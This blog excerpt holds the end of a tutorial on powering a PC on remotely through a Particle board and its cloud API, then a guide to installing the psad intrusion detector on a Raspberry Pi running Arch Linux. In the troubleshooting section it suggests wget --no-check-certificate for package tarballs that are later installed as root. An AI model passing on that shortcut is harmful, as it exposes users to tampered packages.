<span class="cm"> * (at your option) any later version.</span>
<span class="cm"> * </span>
<span class="cm"> * This program is distributed in the hope that it will be useful,</span>
<span class="cm"> * but WITHOUT ANY WARRANTY; without even the implied warranty of</span>
<span class="cm"> * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the</span>
<span class="cm"> * GNU General Public License for more details.</span>
<span class="cm"> */</span>
<span class="kt">void</span> <span class="nf">setup</span><span class="p">()</span> <span class="p">{</span>
<span class="c1">// D0 will control the motherboard</span>
<span class="n">pinMode</span><span class="p">(</span><span class="n">D0</span><span class="p">,</span> <span class="n">OUTPUT</span><span class="p">);</span>
<span class="c1">// ATX boards maintain high power on their power pin and then ground</span>
<span class="c1">// shortly to signal that the motherboard should power up. So we</span>
<span class="c1">// normally want the pin to be in the high state.</span>
<span class="n">digitalWrite</span><span class="p">(</span><span class="n">D0</span><span class="p">,</span> <span class="n">HIGH</span><span class="p">);</span>
<span class="c1">// Register a function with Particle&#39;s cloud service so we can invoke</span>
<span class="c1">// the core from over the internet.</span>
<span class="n">Spark</span><span class="p">.</span><span class="n">function</span><span class="p">(</span><span class="s">&quot;poweron&quot;</span><span class="p">,</span> <span class="n">powerOn</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">loop</span><span class="p">()</span> <span class="p">{</span>
<span class="c1">// Nothing to do</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">powerOn</span><span class="p">(</span><span class="n">String</span> <span class="n">command</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// Switch the pin to low for half a second so the motherboard knows</span>
<span class="c1">// it&#39;s time to turn on.</span>
<span class="n">digitalWrite</span><span class="p">(</span><span class="n">D0</span><span class="p">,</span> <span class="n">LOW</span><span class="p">);</span>
<span class="n">delay</span><span class="p">(</span><span class="mi">500</span><span class="p">);</span>
<span class="n">digitalWrite</span><span class="p">(</span><span class="n">D0</span><span class="p">,</span> <span class="n">HIGH</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
</pre></div>
<p>Once we've flashed our Particle with this software, all that's left is to use it!</p>
<h2>Pressing the button... from anywhere in the world</h2>
<p>You can communicate with your Particle through their REST API. The simplest way to do this is with a curl command:</p>
<div class="highlight"><pre><span></span>curl https://api.particle.io/v1/devices/device_id/powerOn -d <span class="nv">access_token</span><span class="o">=</span>access_token
</pre></div>
<p>Where <code>device_id</code> is the ID for your Particle and the <code>access_token</code> is your account token.</p>
<p>And that's it! Hopefully you've found this tutorial to be useful. If you have any questions or comments, you can contact me via any of the means listed on my <a href="https://carteryagemann.com/index.html">homepage</a>.</p>
<p><em>Happy hacking!</em></p>Installing psad on Raspberry Pi Running Arch Linux2015-02-13T11:00:00-05:002015-02-13T11:00:00-05:00Carter Yagemanntag:carteryagemann.com,2015-02-13:/psad-on-pi.html<p>I've been fooling around with IDS and specifically psad and I thought it would be fun to try installing psad on my raspberry pi. Little did I know, installing psad on an ARM processor running Arch Linux with systemd is not a simple process. It took me great effort to …</p><p>I've been fooling around with IDS and specifically psad and I thought it would be fun to try installing psad on my raspberry pi. Little did I know, installing psad on an ARM processor running Arch Linux with systemd is not a simple process. It took me great effort to get psad running correctly, so I thought I'd take the time to document my struggles in the hopes that this will be useful to someone else.</p>
<h1>What is psad?</h1>
<p>psad is an intrusion detection system (IDS) which works by monitoring logs generated by iptables (a network firewall common to most Linux distros). You can find more information on psad <a href="http://cipherdyne.org/psad/">here</a>.</p>
<h1>Scope of this document</h1>
<p>The focus of this document is on challenges I ran into while trying to get psad to install and run on a raspberry pi and my solutions. This document does not cover how to configure or use psad. It <em>does</em> cover things which I had to taken into consideration due to the raspberry pi CPU being an ARM processor and due to my OS being Arch Linux with systemd.</p>
<h1>Contact</h1>
<p>Many of my solutions are hacks and probably suboptimal hacks at that. If you see anything wrong with this guide or have better solutions to the problems I covered here, feel free to contact me at <a href="mailto:cmyagema@syr.edu">cmyagema@syr.edu</a>.</p>
<h1>Other Useful Resources</h1>
<ul>
<li><a href="http://cipherdyne.org/psad/">psad homepage</a></li>
<li>An installation guide that helped me <em>(Edit: This blog no longer exists)</em></li>
<li><a href="https://www.digitalocean.com/community/tutorials/how-to-use-psad-to-detect-network-intrusion-attempts-on-an-ubuntu-vps">A guide on configuring psad</a></li>
</ul>
<h1>Installing psad for ARM from AUR</h1>
<p>Since psad is not included in the main Arch Linux repositories, it has to be downloaded, compiled, and built from the AUR repository.</p>
<p>First, create a file (I will name it "list.txt") and write in it the following URLs:</p>
<div class="highlight"><pre><span></span>https://aur.archlinux.org/packages/pe/perl-unix-syslog/perl-unix-syslog.tar.gz
https://aur.archlinux.org/packages/pe/perl-iptables-parse/perl-iptables-parse.tar.gz
https://aur.archlinux.org/packages/pe/perl-iptables-chainmgr/perl-iptables-chainmgr.tar.gz
https://aur.archlinux.org/packages/ps/psad/psad.tar.gz
</pre></div>
<p>These are the tarballs which we will need from AUR.</p>
<p>Next, run the following commands to untar the tarballs, build them, and install them:</p>
<div class="highlight"><pre><span></span>cat list.txt <span class="p">|</span> xargs wget
tar xzvf perl-iptables-parse.tar.gz
<span class="nb">cd</span> perl-iptables-parse
makepkg -Acs
sudo pacman -U perl-iptables-parse-1.1-2-any.pkg.tar.xz
<span class="nb">cd</span> ..
tar xzvf perl-unix-syslog.tar.gz
<span class="nb">cd</span> perl-unix-syslog
makepkg -Acs
sudo pacman -U perl-unix-syslog-1.1-4-any.pkg.tar.xz
<span class="nb">cd</span> ..
tar xzvf perl-iptables-chainmgr.tar.gz
<span class="nb">cd</span> perl-iptables-chainmgr
makepkg -Acs
sudo pacman -U perl-iptables-chainmgr-1.2-2-any.pkg.tar.xz
<span class="nb">cd</span> ..
tar xzvf psad.tar.gz
<span class="nb">cd</span> psad
makepkg -Acs
sudo pacman -U --force psad-2.2.3-1-armv6h.pkg.tar.xz
</pre></div>
<p>Now if you are lucky, unlike me, this should be all you have to do. However, I ran into many additional problems which is what I will focus on in the next section.</p>
<h1>Configuration</h1>
<p>As I mentioned earlier, I am not going to cover how to configure psad. There is, however, one configuration which I will mention because it's different from other systems. Namely, the location for syslog is in an usual location because of how systemd logs.</p>
<p>To fix this setting, list the contents of your <code>/var/log/journal/</code> directory. You should see a directory containing a bunch of letters and numbers and inside that directory should be a file called <code>system.journal</code>. I found that this is the file which psad has to be pointed to.</p>
<p>Once you have identified this path, open <code>/etc/psad/psad.conf</code> and point <code>IPT_SYSLOG_FILE</code> to this file. In my case, this means:</p>
<div class="highlight"><pre><span></span>IPT_SYSLOG_FILE /var/log/journal/37ed4fd73b0c416886710f1c8ffa083b/system.journal;
</pre></div>
<p>If you want to try port scanning yourself or in general test your psad installation, be mindful that the raspberry pi has very limited computing resources so it might take awhile for your test to reflect in psad's status.</p>
<h2>Troubleshooting</h2>
<h3>wget fails due to certificates</h3>
<p>This one is easy, just replace the <code>cat link | xargs wget</code> with <code>cat link | xargs wget --no-check-certificate</code>.</p>
<h3>makepkg fails and returns a build error</h3>
<p>Try rebooting the raspberry pi. Sometimes not having enough memory can cause the build to fail.</p>
<h3>psad is installed, but when I run <code>sudo psad -S</code> I get the message <code>pid file [...]/psadwatchd.pid does not exist</code></h3>
<p>If you're seeing this towards the top of the output for <code>sudo psad -S</code>:</p>
<div class="highlight"><pre><span></span>[-] psad: pid file /var/run/psad/psadwatchd.pid does not exist for psadwatchd on HOSTNAME
</pre></div>
<p>Then you probably have the same problem I had.</p>
<p>This was the most painful of the problems I ran into and this was the problem which was big enough to convince me to write this document. If I hadn't ran into this issue (and the systemd logging issue), I wouldn't have bothered writing any of this. The problem in my case was "psadwatchd" wasn't starting for some reason when "psad" started. To confirm this as the source of the problem, run:</p>
<div class="highlight"><pre><span></span>ps -A | grep &quot;psad&quot;
</pre></div>
<p>If you only see one process called "psad" and no "psadwatchd", then you're having the same problem as me.</p>
<p>The solution I came up for this is very much a hack, but it works decently. Basically, I got around this by making a separate service for psadwatchd.</p>
<p>First, create a new file: <code>/etc/systemd/system/psadwatchd.service</code></p>
<p>In this file, write:</p>
<div class="highlight"><pre><span></span><span class="k">[Unit]</span>
<span class="na">Description</span><span class="o">=</span><span class="s">Port scan attack detector daemon</span>
<span class="na">After</span><span class="o">=</span><span class="s">psad.service</span>
<span class="k">[Service]</span>
<span class="na">ExecStart</span><span class="o">=</span><span class="s">/usr/sbin/psadwatchd</span>
<span class="na">Type</span><span class="o">=</span><span class="s">oneshot</span>
<span class="na">RemainAfterExit</span><span class="o">=</span><span class="s">yes</span>
<span class="k">[Install]</span>
<span class="na">WantedBy</span><span class="o">=</span><span class="s">multi-user.target</span>
</pre></div>
<p>Next, confirm that you wrote this service file correctly by starting it in systemctl:</p>
<div class="highlight"><pre><span></span>sudo systemctl start psadwatchd
</pre></div>
<p>If all went as it should, you should be able to execute the following two commands:</p>
<div class="highlight"><pre><span></span>ps -A <span class="p">|</span> grep <span class="s2">&quot;psad&quot;</span>
sudo psad -S
</pre></div>
<p>The first command should return both a <code>psad</code> process and a <code>psadwatchd</code> process. The second command should now show information on psadwatchd and no longer show an error about missing PID files.</p>
<p>Now that you've made a working psadwatchd service file, add this new service to systemd's startup list:</p>
<div class="highlight"><pre><span></span>sudo systemctl <span class="nb">enable</span> psadwatchd
</pre></div>
<p>And that should be it (hopefully).</p>